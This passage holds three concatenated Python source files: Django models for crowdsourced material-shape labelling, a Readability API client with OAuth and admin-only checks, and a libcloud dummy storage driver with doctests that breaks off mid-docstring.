name_score = models.FloatField(null=True, blank=True)
#: Best rectified normal for this shape
rectified_normal = models.ForeignKey(
'normals.ShapeRectifiedNormalLabel', null=True, blank=True)
#: Best reflectance for this shape
bsdf_wd = models.ForeignKey(
'bsdfs.ShapeBsdfLabel_wd', null=True, blank=True)
#: Default filters for views
DEFAULT_FILTERS = {
'pixel_area__gt': Shape.MIN_PIXEL_AREA,
'invalid': False,
'correct': True,
'synthetic': False,
'photo__inappropriate': False,
'photo__stylized': False,
'photo__rotated': False,
'photo__nonperspective': False,
'photo__scene_category_correct': True,
'photo__scene_category_correct_score__isnull': False,
}
def has_substance(self):
return self.substance is not None
def save(self, *args, **kwargs):
if not self.substance_entropy or not self.name_entropy:
self.update_entropy(save=False)
super(MaterialShape, self).save(*args, **kwargs)
def update_entropy(self, save=True):
""" Update best label for each type of data """
#min_consensus = self.mturk_assignment.hit.hit_type \
#.experiment_settings.min_output_consensus
min_consensus = 3
# update substance label and entropy
self.substance = None
substances = self.substances.filter(invalid=False) \
.values_list('substance_id', flat=True)
if substances:
self.substance_entropy = compute_entropy(substances)
hist = Counter(substances).most_common(2)
substance_id, count = hist[0]
# must be at least the consensus, and larger than the 2nd choice
if count >= min_consensus and (len(hist) == 1 or hist[1][1] < count):
self.substance_id = substance_id
self.quality_method = 'M'
# update name label and entropy
self.name = None
names = self.names.filter(invalid=False) \
.values_list('name_id', flat=True)
if names.exists():
self.name_entropy = compute_entropy(names)
hist = Counter(names).most_common(2)
name_id, count = hist[0]
# must be at least the consensus, and larger than the 2nd choice
if count >= min_consensus and (len(hist) == 1 or hist[1][1] < count):
self.name_id = name_id
self.quality_method = 'M'
# update rectified normal
self.rectified_normal = None
if self.planar:
for n in self.rectified_normals.all():
if n.better_than(self.rectified_normal):
self.rectified_normal = n
if self.rectified_normal and not self.rectified_normal.correct:
self.rectified_normal = None
# update bsdf
self.bsdf_wd = None
for b in self.bsdfs_wd.all():
if b.gloss_correct and b.color_correct and b.better_than(self.bsdf_wd):
self.bsdf_wd = b
if save:
self.save()
def num_material_votes(self):
""" mturk votes that the shape is a good material segmentation """
return self.qualities.filter(correct=True).count()
def num_bad_votes(self):
""" mturk votes that the shape is a bad segmentation """
return self.qualities.filter(correct=False).count()
def num_votes(self):
""" mturk vote count """
return self.qualities.count()
def votes_dict(self):
""" mturk votes as a python dictionary """
votes = {'M': 0, 'B': 0}
for q in self.qualities.all():
if q.correct:
votes['M'] += 1
else:
votes['B'] += 1
return votes
def num_planar_votes(self):
return self.planarities.filter(planar=True).count()
def num_nonplanar_votes(self):
return self.planarities.filter(planar=False).count()
def num_planarity_votes(self):
return self.planarities.count()
def __unicode__(self):
return 'MaterialShape (%s v, id=%s)' % (self.num_vertices, self.id)
def get_absolute_url(self):
return reverse('shapes.views.material_shape_detail', args=[str(self.id)])
def get_thumb_template(self):
return 'material_shape_thumb.html'
class SubmittedShape(ResultBase):
""" Simple polygon submitted by a user (described by a single closed
poly-line, no holes) """
photo = models.ForeignKey(Photo, related_name='submitted_shapes')
# Vertices format: x1,y1,x2,y2,x3,y3,... (coords are fractions of width/height)
# (this format allows easy embedding into javascript)
vertices = models.TextField(null=True)
# num_vertices should be equal to len(points.split(','))//2
num_vertices = models.IntegerField(null=True)
# shape type
SHAPE_TYPES = (('M', 'material'), ('O', 'object'))
shape_type_to_str = dict((k, v) for (k, v) in SHAPE_TYPES)
str_to_shape_type = dict((v, k) for (k, v) in SHAPE_TYPES)
shape_type = models.CharField(max_length=1, choices=SHAPE_TYPES)
def __unicode__(self):
return '%s vertices' % self.num_vertices
def get_thumb_template(self):
return 'submitted_shape_thumb.html'
def publishable(self):
return self.photo.publishable()
#@classmethod
#def mturk_badness(cls, mturk_assignment):
#""" Return fraction of bad responses for this assignment """
#shapes = cls.objects.filter(mturk_assignment=mturk_assignment)
#if not shapes:
#return None
## reject all-triangle or empty submissions
#if all(s.num_vertices < 4 for s in shapes):
#return 1.0
#tshapes = []
#for s in shapes:
#if s.shape_type == 'M':
#tshapes += s.material_shapes.all()
#elif s.shape_type == 'O':
#tshapes += s.object_shapes.all()
#else:
#raise ValueError('Error in model')
## we can't really say what happened, so we shouldn't reject it
#if not tshapes:
#return 0.0
## count percentage of bad labels
#bad = 0
#for ts in tshapes:
#if ts.time_ms < 3000:
#bad += 1
#elif ts.pixel_area < Shape.MIN_PIXEL_AREA:
#bad += 0.5
#elif ts.correct_score is None:
#return None
#elif ts.correct_score < -0.5 and ts.time_ms < 30000:
#bad += 1.0
#if bad > 0:
#return float(bad) / float(len(tshapes))
## reward good shapes; the negative badness score
## becomes a bonus later on
#return sum(-1.0 for ts in tshapes if
#ts.correct_score > 0.5 and
#ts.num_vertices > 30 and
#ts.time_ms > 30000 and
#ts.area > 0.03)
@staticmethod
def mturk_submit(user, hit_contents, results, time_ms, time_active_ms,
experiment, version, mturk_assignment=None, **kwargs):
""" Add new instances from a mturk HIT after the user clicks [submit] """
if unicode(version) != u'1.0':
raise ValueError("Unknown version: %s" % version)
photo = hit_contents[0]
poly_list = results[str(photo.id)]
time_ms_list = time_ms[str(photo.id)]
time_active_ms_list = time_active_ms[str(photo.id)]
if len(poly_list) != len(time_ms_list):
raise ValueError("Result length mismatch (%s polygons, %s times)" % (
len(poly_list), len(time_ms_list)))
shape_model = MaterialShape
slug = experiment.slug
if slug == "segment_material":
shape_type = 'M'
elif slug == "segment_object":
shape_type = 'O'
else:
raise ValueError("Unknown slug: %s" % slug)
# store results in SubmittedShape objects
new_objects_list = []
for idx in xrange(len(poly_list)):
poly_vertices = poly_list[idx]
poly_time_ms = time_ms_list[idx]
poly_time_active_ms = time_active_ms_list[idx]
num_vertices = len(poly_vertices)
if num_vertices % 2 != 0:
raise ValueError("Odd number of vertices (%d)" % num_vertices)
num_vertices //= 2
new_obj, created = photo.submitted_shapes.get_or_create(
user=user,
mturk_assignment=mturk_assignment,
time_ms=poly_time_ms,
time_active_ms=poly_time_active_ms,
# (repr gives more float digits)
vertices=','.join([repr(f) for f in poly_vertices]),
num_vertices=num_vertices,
shape_type=shape_type
)
if created:
new_objects_list.append(new_obj)
# triangulate polygons (creates instances of shape_model)
if new_objects_list:
from shapes.tasks import triangulate_submitted_shapes_task
triangulate_submitted_shapes_task.delay(
photo, user, mturk_assignment, shape_model, new_objects_list)
if new_objects_list:
return {get_content_tuple(photo): new_objects_list}
else:
return {}
##
## Labels
##
class MaterialShapeLabelBase(ResultBase):
""" Abstract parent for labels attached to material shapes """
#: vote from admin
#: -2: reject
#: -1: can't really tell what's going on
#: 0: un-voted
#: 1: good, but missed something (not rotated)
#: 2: correct
#: 3: correct exemplar
admin_score = models.IntegerField(default=0)
# if false, then the user started working on a label but did not submit
#complete = models.BooleanField(default=False)
def publishable(self):
return self.shape.publishable()
def get_thumb_template(self):
return 'material_shape_label_thumb.html'
class Meta:
abstract = True
ordering = ['shape', '-time_ms']
class ShapeSubstanceLabel(MaterialShapeLabelBase):
""" Material common name, e.g. "Wood", "Brick" """
shape = models.ForeignKey(MaterialShape, related_name="substances")
substance = models.ForeignKey(ShapeSubstance, blank=True, null=True)
def __unicode__(self):
if self.substance:
base = self.substance.name
else:
return "(Invalid label)"
if self.mturk_assignment.hit.sandbox:
return base + " (SB)"
else:
return base
class Meta:
ordering = ['-substance', '-time_ms']
def get_thumb_overlay(self):
return self.__unicode__()
#@classmethod
#def mturk_badness(cls, mturk_assignment):
#""" Return fraction of bad responses for this assignment """
#labels = cls.objects.filter(mturk_assignment=mturk_assignment)
#if not labels:
#return None
#total = sum(1 for l in labels if l.shape.substance)
#if total == 0:
#return None
#bad = sum(1 for l in labels if
#l.time_ms < 400 or
#(l.shape.substance and l.substance != l.shape.substance))
#return float(bad) / max(float(total), 3)
@staticmethod
def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
mturk_assignment=None, **kwargs):
""" Add new instances from a mturk HIT after the user clicks [submit] """
if unicode(version) != u'1.0':
raise ValueError("Unknown version: '%s'" % version)
if not hit_contents:
return {}
if not user:
raise ValueError("Null user")
new_objects = {}
for shape in hit_contents:
name_string = results[unicode(shape.id)]
shape_time_ms = time_ms[unicode(shape.id)]
shape_time_active_ms = time_active_ms[unicode(shape.id)]
# normalize case
name_string = name_string.lower()
name_string = name_string[0].upper() + name_string[1:]
substance, created = ShapeSubstance.objects.get_or_create(
name=name_string,
)
new_obj, created = shape.substances.get_or_create(
user=user,
mturk_assignment=mturk_assignment,
time_ms=shape_time_ms,
time_active_ms=shape_time_active_ms,
substance=substance)
if created and substance:
shape.update_entropy(save=True)
new_objects[get_content_tuple(shape)] = [new_obj]
return new_objects
class MaterialShapeNameLabel(MaterialShapeLabelBase):
""" Object common name, e.g. "chair", "door" """
#: Shape being labeled
shape = models.ForeignKey(MaterialShape, related_name="names")
#: Object name chosen for the shape
name = models.ForeignKey(ShapeName, blank=True, null=True)
def __unicode__(self):
if self.name:
base = self.name.name
else:
return "(Invalid label)"
if self.mturk_assignment.hit.sandbox:
return base + " (SB)"
else:
return base
class Meta:
ordering = ['-name', '-time_ms']
def get_thumb_overlay(self):
return self.__unicode__()
#@classmethod
#def mturk_badness(cls, mturk_assignment):
#""" Return fraction of bad responses for this assignment """
#labels = cls.objects.filter(mturk_assignment=mturk_assignment)
#if not labels:
#return None
#total = sum(1 for l in labels if l.shape.name)
#if total == 0:
#return None
#bad = sum(1 for l in labels if
#l.time_ms < 400 or
#(l.shape.name and l.name != l.shape.name))
#return float(bad) / max(3, float(total))
@staticmethod
def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
mturk_assignment=None, **kwargs):
""" Add new instances from a mturk HIT after the user clicks [submit] """
if unicode(version) != u'1.0':
raise ValueError("Unknown version: '%s'" % version)
if not hit_contents:
return {}
if not user:
raise ValueError("Null user")
new_objects = {}
for shape in hit_contents:
name_string = results[unicode(shape.id)]
shape_time_ms = time_ms[unicode(shape.id)]
shape_time_active_ms = time_active_ms[unicode(shape.id)]
# normalize case
name_string = name_string.lower()
name_string = name_string[0].upper() + name_string[1:]
name = ShapeName.objects.get_or_create(
name=name_string,
)[0]
new_obj, created = shape.names.get_or_create(
user=user,
mturk_assignment=mturk_assignment,
time_ms=shape_time_ms,
time_active_ms=shape_time_active_ms,
name=name)
if created and name:
shape.update_entropy(save=True)
new_objects[get_content_tuple(shape)] = [new_obj]
return new_objects
class ShapePlanarityLabel(MaterialShapeLabelBase):
""" Vote for whether or not a material shape is flat """
shape = models.ForeignKey(MaterialShape, related_name='planarities')
planar = models.BooleanField(default=False)
canttell = models.NullBooleanField()
def __unicode__(self):
if self.canttell:
return "can't tell"
else:
return 'planar' if self.planar else 'not planar'
class Meta:
verbose_name = "Shape planarity label"
verbose_name_plural = "Shape planarity labels"
#@classmethod
#def mturk_badness(cls, mturk_assignment):
#""" Return fraction of bad responses for this assignment """
#labels = cls.objects.filter(mturk_assignment=mturk_assignment)
#if not labels:
#return None
#if any(l.shape.planar_score is None for l in labels):
#return None
#bad = sum(1 for l in labels if l.planar != l.shape.planar)
#return float(bad) / float(len(labels))
@staticmethod
def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
mturk_assignment=None, **kwargs):
""" Add new instances from a mturk HIT after the user clicks [submit] """
if unicode(version) != u'1.0':
raise ValueError("Unknown version: '%s'" % version)
if not hit_contents:
return {}
# best we can do is average
avg_time_ms = time_ms / len(hit_contents)
avg_time_active_ms = time_active_ms / len(hit_contents)
new_objects = {}
for shape in hit_contents:
selected = (
str(results[unicode(shape.id)]['selected']).lower() == 'true')
canttell = (
str(results[unicode(shape.id)]['canttell']).lower() == 'true')
new_obj, created = shape.planarities.get_or_create(
user=user,
mturk_assignment=mturk_assignment,
time_ms=avg_time_ms,
time_active_ms=avg_time_active_ms,
planar=selected,
canttell=canttell,
)
if created:
new_objects[get_content_tuple(shape)] = [new_obj]
return new_objects
class MaterialShapeQuality(MaterialShapeLabelBase):
""" Vote on whether or not a shape is indeed a material or oject segmentation """
shape = models.ForeignKey(MaterialShape, related_name='qualities')
correct = models.BooleanField(default=False)
canttell = models.NullBooleanField()
def __unicode__(self):
if self.canttell:
return "can't tell"
else:
return 'correct' if self.correct else 'not correct'
class Meta:
verbose_name = "Shape quality vote"
verbose_name_plural = "Shape quality votes"
#@classmethod
#def mturk_badness(cls, mturk_assignment):
#""" Return fraction of bad responses for this assignment """
#labels = cls.objects.filter(mturk_assignment=mturk_assignment)
#if not labels:
#return None
#if any(l.shape.correct_score is None for l in labels):
#return None
#bad = sum(1 for l in labels if l.correct != l.shape.correct
#and abs(l.shape.correct_score) > 0.5)
#return float(bad) / float(len(labels))
@staticmethod
def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
mturk_assignment=None, **kwargs):
""" Add new instances from a mturk HIT after the user clicks [submit] """
if unicode(version) != u'1.0':
raise ValueError("Unknown version: '%s'" % version)
if not hit_contents:
return {}
# best we can do is average
avg_time_ms = time_ms / len(hit_contents)
avg_time_active_ms = time_active_ms / len(hit_contents)
new_objects = {}
for shape in hit_contents:
selected = (
str(results[unicode(shape.id)]['selected']).lower() == 'true')
canttell = (
str(results[unicode(shape.id)]['canttell']).lower() == 'true')
new_obj, created = shape.qualities.get_or_create(
user=user,
mturk_assignment=mturk_assignment,
time_ms=avg_time_ms,
time_active_ms=avg_time_active_ms,
correct=selected,
canttell=canttell,
)
if created:
new_objects[get_content_tuple(shape)] = [new_obj]
return new_objects
| |
# -*- coding: utf-8 -*-
"""
readability.api
~~~~~~~~~~~~~~~
This module provies the core Readability API interface.
"""
import urllib
import urlparse
import oauth2
from decorator import decorator
from .config import settings
from .models import Bookmark, Article, Domain, Contribution, User
from .helpers import is_collection, to_python, to_api, get_scope
try:
import json
except ImportError:
import simplejson as json
@decorator
def admin_only(f, *args, **kwargs):
"""Admin-level API constraint decorator.
Raises PermissionsError if settings.admin is not True.
"""
if not settings.admin:
func = get_scope(f, args)
raise PermissionsError('%s is for Readability Admins only.' % (func,))
return f(*args, **kwargs)
def raise_for_admin(status_code):
if not settings.admin:
raise PermissionsError('Resource for Readability Admins only.')
def raise_for_status(response):
"""Rasies appropriate errors for given HTTP Status, if neccesary."""
status_code = int(response['status'])
status_map = {
400: BadRequestError,
401: AuthenticationError,
404: MissingError,
403: PermissionsError,
500: ServerError,
}
if status_code in status_map:
raise status_map[status_code](response=response)
class ReadabilityCore(object):
"""The main Readability API interface."""
def __init__(self):
self.token = None
self.username = None
self.settings = settings
def setup_client(self, token, consumer_key, consumer_secret):
token = oauth2.Token(*token)
consumer = oauth2.Consumer(consumer_key, consumer_secret)
self.token = token
self.client = oauth2.Client(consumer, token)
self.username = self.get_me().username
return True
@property
def token_tuple(self):
"""Returns serializable OAuth token."""
token = dict(urlparse.parse_qsl(str(self.token)))
return (token['oauth_token'], token['oauth_token_secret'])
@staticmethod
def _resource_serialize(o):
"""Returns JSON serialization of given object."""
return json.dumps(o)
@staticmethod
def _resource_deserialize(s):
"""Returns dict deserialization of a given JSON string."""
try:
return json.loads(s)
except ValueError:
raise ResponseError('The API Response was not valid.')
def _generate_url(self, resource, params):
"""Generates Readability API Resource URL."""
if is_collection(resource):
resource = map(str, resource)
resource = '/'.join(resource)
if params:
resource += '?%s' % (urllib.urlencode(params))
return settings.base_url % (resource,)
def _get_http_resource(self, resource, params=None):
"""GETs HTTP Resource at given path."""
url = self._generate_url(resource, params)
if settings.verbose:
settings.verbose.write('%s\n' % (url,))
r, content = self.client.request(url, method='GET')
raise_for_status(r)
return content
def _post_http_resource(self, resource, params=None):
"""POSTs HTTP Resource at given path."""
url = self. _generate_url(resource, None)
params = urllib.urlencode(params)
r, content = self.client.request(url, method='POST', body=params)
raise_for_status(r)
return r
def _delete_http_resource(self, resource, params=None):
"""DELETEs HTTP Resource at given path."""
url = self. _generate_url(resource, None)
r, content = self.client.request(url, method='DELETE')
return r
def _to_map(self, obj, iterable):
"""Maps given dict iterable to a given Resource object."""
a = []
for it in iterable:
a.append(obj.new_from_dict(it, rdd=self))
return a
def _get_resources(self, key, obj, limit=None, **kwargs):
"""GETs resources of given path, maps them to objects, and
handles paging.
"""
if (limit is None) and ('per_page' not in kwargs):
kwargs.update(per_page=50)
else:
kwargs.update(per_page=limit)
items = []
response = self._get_http_resource(key, params=kwargs)
response = self._resource_deserialize(response)
meta = response.get('meta')
items.extend(self._to_map(obj, response.get(key)))
if (len(items) < limit) or (limit is None):
for i in range(meta.get('page')+1, meta.get('num_pages')+1):
kwargs.update(page=i)
if (len(items) < limit) or (limit is None):
response = self._get_http_resource(key, params=kwargs)
response = self._resource_deserialize(response)
items.extend(self._to_map(obj, response.get(key)))
return items[:limit]
def _get_resource(self, http_resource, obj, **kwargs):
"""GETs API Resource of given path."""
item = self._get_http_resource(http_resource, params=kwargs)
item = self._resource_deserialize(item)
return obj.new_from_dict(item, rdd=self)
def _post_resource(self, http_resource, **kwargs):
"""POSTs API Resource of given path."""
r = self._post_http_resource(http_resource, params=kwargs)
return r
def _delete_resource(self, http_resource):
"""DELETEs API Resource of given path."""
r = self._delete_http_resource(http_resource)
if r['status'] in ('200', '204'):
return True
else:
return False
class Readability(ReadabilityCore):
"""Main Readability API Endpoint for user consumption."""
def __init__(self):
super(Readability, self).__init__()
@admin_only
def get_articles(self, author=None, user=None, domain=None, limit=None, **filters):
"""Gets a list of articles."""
filters.update(author=author, user=user, domain=domain)
filters = to_api(
filters,
date_keys=(
'added_since', 'added_until', 'published_since',
'published_until'
)
)
return self._get_resources('articles', Article, limit=limit, **filters)
def get_article(self, id):
"""Gets Article of given ID."""
return self._get_resource(('articles', id), Article)
def get_bookmarks(self, archive=None, favorite=None, domain=None, order=None, limit=None, **filters):
"""Gets a list of bookmarks."""
filters.update(
archive=archive,
favorite=favorite,
domain=domain,
order=order
)
filters = to_api(
filters,
date_keys = (
'added_since', 'added_until', 'opened_since', 'opened_until',
'archived_since', 'archived_until', 'favorited_since',
'favorited_until', 'updated_since', 'updated_until'
),
int_keys = ('archive', 'favorite')
)
return self._get_resources('bookmarks', Bookmark, limit=limit, **filters)
@admin_only
def get_bookmarks_by_user(self, username, **filters):
"""Gets bookmark of given user."""
return self.get_bookmarks(user=username, **filters)
def get_bookmark(self, id):
"""Gets bookmark of given ID."""
return self._get_resource(('bookmarks', id), Bookmark)
def get_contributions(self, limit=None, **filters):
"""Gets a list of contributions."""
return self._get_resources('contributions', Contribution, limit=limit, params=filters)
@admin_only
def get_contributions_by_user(self, username, **filters):
"""Gets a list of contributions by given username."""
return self.get_contributions(user=username, **filters)
@admin_only
def get_domains(self, domain=None, limit=None):
"""Gets a list of domains.
.. warning::
This Query is very slow.
"""
filters = to_api(dict(domain=domain))
return self._get_resources('domains', Domain, limit=limit, params=filters)
@admin_only
def get_domain(self, id):
"""Gets domain of given ID."""
return self._get_resource(('domains', id), Domain)
def get_me(self):
"""Returns logged in user."""
return self._get_resource(('users', '_current'), User)
@admin_only
def get_users(self, limit=None, **filters):
"""Returns a list of users."""
filters = to_api(filters, date_keys=('joined_since', 'joined_until'))
return self._get_resources('users', User, limit=limit, params=filters)
@admin_only
def get_user(self, username='_current'):
"""Retrives a given user."""
return self._get_resource(('users', username), User)
def add_bookmark(self, url, favorite=False, archive=False):
"""Adds given bookmark."""
r = self._post_resource(('bookmarks'), url=url, favorite=favorite, archive=archive)
# As 409 status code indicates an already bookmarked
# url, it should be considered as valid, and return
# the bookmark it points to.
if r['status'] not in ('200','202', '409'):
raise ResponseError('')
loc = r['location']
resource = loc.split('/').pop()
return self.get_bookmark(resource)
# ----------
# Exceptions
# ----------
class APIError(Exception):
def __init__(self, msg=None, response=None):
if msg is None:
self.msg = self.__doc__
else:
self.msg = msg
self.response = response
def __str__(self):
if self.response is not None:
return "%s - response: %s" % (repr(self.msg), repr(self.response))
else:
return repr(self.msg)
class PermissionsError(APIError):
"""You do not have proper permission."""
class AuthenticationError(APIError):
"""Authentication failed."""
class ResponseError(APIError):
"""The API Response was unexpected."""
class MissingError(APIError):
"""The Resource does not exist."""
class BadRequestError(APIError):
"""The request could not be understood due to bad syntax. Check your request and try again."""
class ServerError(APIError):
"""The server encountered an error and was unable to complete your request."""
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import random
import hashlib
from libcloud.utils.py3 import PY3
from libcloud.utils.py3 import b
if PY3:
from io import FileIO as file
from libcloud.common.types import LibcloudError
from libcloud.storage.base import Object, Container, StorageDriver
from libcloud.storage.types import ContainerAlreadyExistsError
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import ObjectDoesNotExistError
class DummyFileObject(file):
def __init__(self, yield_count=5, chunk_len=10):
self._yield_count = yield_count
self._chunk_len = chunk_len
def read(self, size):
i = 0
while i < self._yield_count:
yield self._get_chunk(self._chunk_len)
i += 1
raise StopIteration
def _get_chunk(self, chunk_len):
chunk = [str(x) for x in random.randint(97, 120)]
return chunk
def __len__(self):
return self._yield_count * self._chunk_len
class DummyIterator(object):
def __init__(self, data=None):
self.hash = hashlib.md5()
self._data = data or []
self._current_item = 0
def get_md5_hash(self):
return self.hash.hexdigest()
def next(self):
if self._current_item == len(self._data):
raise StopIteration
value = self._data[self._current_item]
self.hash.update(b(value))
self._current_item += 1
return value
def __next__(self):
return self.next()
class DummyStorageDriver(StorageDriver):
"""
Dummy Storage driver.
>>> from libcloud.storage.drivers.dummy import DummyStorageDriver
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = driver.create_container(container_name='test container')
>>> container
<Container: name=test container, provider=Dummy Storage Provider>
>>> container.name
'test container'
>>> container.extra['object_count']
0
"""
name = 'Dummy Storage Provider'
website = 'http://example.com'
def __init__(self, api_key, api_secret):
"""
@param api_key: API key or username to used (required)
@type api_key: C{str}
@param api_secret: Secret password to be used (required)
@type api_secret: C{str}
@rtype: C{None}
"""
self._containers = {}
def get_meta_data(self):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> driver.get_meta_data()['object_count']
0
>>> driver.get_meta_data()['container_count']
0
>>> driver.get_meta_data()['bytes_used']
0
>>> container = driver.create_container(container_name='test container 1')
>>> container = driver.create_container(container_name='test container 2')
>>> obj = container.upload_object_via_stream(
... object_name='test object', iterator=DummyFileObject(5, 10), extra={})
>>> driver.get_meta_data()['object_count']
1
>>> driver.get_meta_data()['container_count']
2
>>> driver.get_meta_data()['bytes_used']
50
@rtype: C{dict}
"""
container_count = len(self._containers)
object_count = sum([len(self._containers[container]['objects']) for
container in self._containers])
bytes_used = 0
for container in self._containers:
objects = self._containers[container]['objects']
for _, obj in objects.items():
bytes_used += obj.size
return {'container_count': int(container_count),
'object_count': int(object_count),
'bytes_used': int(bytes_used)}
def iterate_containers(self):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> list(driver.iterate_containers())
[]
>>> container = driver.create_container(container_name='test container 1')
>>> container
<Container: name=test container 1, provider=Dummy Storage Provider>
>>> container.name
'test container 1'
>>> container = driver.create_container(container_name='test container 2')
>>> container
<Container: name=test container 2, provider=Dummy Storage Provider>
>>> container = driver.create_container(
... container_name='test container 2') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ContainerAlreadyExistsError:
>>> container_list=list(driver.iterate_containers())
>>> sorted([container.name for container in container_list])
['test container 1', 'test container 2']
@inherits: L{StorageDriver.iterate_containers}
"""
for container in list(self._containers.values()):
yield container['container']
def list_container_objects(self, container):
container = self.get_container(container.name)
return container.objects
def get_container(self, container_name):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> driver.get_container('unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ContainerDoesNotExistError:
>>> container = driver.create_container(container_name='test container 1')
>>> container
<Container: name=test container 1, provider=Dummy Storage Provider>
>>> container.name
'test container 1'
>>> driver.get_container('test container 1')
<Container: name=test container 1, provider=Dummy Storage Provider>
@inherits: L{StorageDriver.get_container}
"""
if container_name not in self._containers:
raise ContainerDoesNotExistError(driver=self, value=None,
container_name=container_name)
return self._containers[container_name]['container']
def get_container_cdn_url(self, container):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> driver.get_container('unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ContainerDoesNotExistError:
>>> container = driver.create_container(container_name='test container 1')
>>> container
<Container: name=test container 1, provider=Dummy Storage Provider>
>>> container.name
'test container 1'
>>> container.get_cdn_url()
'http://www.test.com/container/test_container_1'
@inherits: L{StorageDriver.get_container_cdn_url}
"""
if container.name not in self._containers:
raise ContainerDoesNotExistError(driver=self, value=None,
container_name=container.name)
return self._containers[container.name]['cdn_url']
def get_object(self, container_name, object_name):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> driver.get_object('unknown', 'unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ContainerDoesNotExistError:
>>> container = driver.create_container(container_name='test container 1')
>>> container
<Container: name=test container 1, provider=Dummy Storage Provider>
>>> driver.get_object(
... 'test container 1', 'unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ObjectDoesNotExistError:
>>> obj = container.upload_object_via_stream(object_name='test object',
... iterator=DummyFileObject(5, 10), extra={})
>>> obj
<Object: name=test object, size=50, hash=None, provider=Dummy Storage Provider ...>
@inherits: L{StorageDriver.get_object}
"""
self.get_container(container_name)
container_objects = self._containers[container_name]['objects']
if object_name not in container_objects:
raise ObjectDoesNotExistError(object_name=object_name, value=None,
driver=self)
return container_objects[object_name]
def get_object_cdn_url(self, obj):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = driver.create_container(container_name='test container 1')
>>> container
<Container: name=test container 1, provider=Dummy Storage Provider>
>>> obj = container.upload_object_via_stream(object_name='test object 5',
... iterator=DummyFileObject(5, 10), extra={})
>>> obj
<Object: name=test object 5, size=50, hash=None, provider=Dummy Storage Provider ...>
>>> obj.get_cdn_url()
'http://www.test.com/object/test_object_5'
@inherits: L{StorageDriver.get_object_cdn_url}
"""
container_name = obj.container.name
container_objects = self._containers[container_name]['objects']
if obj.name not in container_objects:
raise ObjectDoesNotExistError(object_name=obj.name, value=None,
driver=self)
return container_objects[obj.name].meta_data['cdn_url']
def create_container(self, container_name):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = driver.create_container(container_name='test container 1')
>>> container
<Container: name=test container 1, provider=Dummy Storage Provider>
>>> container = driver.create_container(
... container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ContainerAlreadyExistsError:
@inherits: L{StorageDriver.create_container}
"""
if container_name in self._containers:
raise ContainerAlreadyExistsError(container_name=container_name,
value=None, driver=self)
extra = {'object_count': 0}
container = Container(name=container_name, extra=extra, driver=self)
self._containers[container_name] = {'container': container,
'objects': {},
'cdn_url':
'http://www.test.com/container/%s' %
(container_name.replace(' ', '_'))
}
return container
def delete_container(self, container):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = Container(name = 'test container',
... extra={'object_count': 0}, driver=driver)
>>> driver.delete_container(container=container)#doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ContainerDoesNotExistError:
>>> container = driver.create_container(
... container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
>>> len(driver._containers)
1
>>> driver.delete_container(container=container)
True
>>> len(driver._containers)
0
>>> container = driver.create_container(
... container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
>>> obj = container.upload_object_via_stream(
... object_name='test object', iterator=DummyFileObject(5, 10), extra={})
>>> driver.delete_container(container=container)#doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ContainerIsNotEmptyError:
@inherits: L{StorageDriver.delete_container}
"""
container_name = container.name
if container_name not in self._containers:
raise ContainerDoesNotExistError(container_name=container_name,
value=None, driver=self)
container = self._containers[container_name]
if len(container['objects']) > 0:
raise ContainerIsNotEmptyError(container_name=container_name,
value=None, driver=self)
del self._containers[container_name]
return True
def download_object(self, obj, destination_path, overwrite_existing=False,
delete_on_failure=True):
kwargs_dict = {'obj': obj,
'response': DummyFileObject(),
'destination_path': destination_path,
'overwrite_existing': overwrite_existing,
'delete_on_failure': delete_on_failure}
return self._save_object(**kwargs_dict)
def download_object_as_stream(self, obj, chunk_size=None):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = driver.create_container(
... container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
>>> obj = container.upload_object_via_stream(object_name='test object',
... iterator=DummyFileObject(5, 10), extra={})
>>> stream = container.download_object_as_stream(obj)
>>> stream #doctest: +ELLIPSIS
<...closed...>
@inherits: L{StorageDriver.download_object_as_stream}
"""
return DummyFileObject()
def upload_object(self, file_path, container, object_name, extra=None,
file_hash=None):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = driver.create_container(container_name='test container 1')
>>> container.upload_object(file_path='/tmp/inexistent.file',
... object_name='test') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
LibcloudError:
>>> file_path = path = os.path.abspath(__file__)
>>> file_size = os.path.getsize(file_path)
>>> obj = container.upload_object(file_path=file_path, object_name='test')
>>> obj #doctest: +ELLIPSIS
<Object: name=test, size=...>
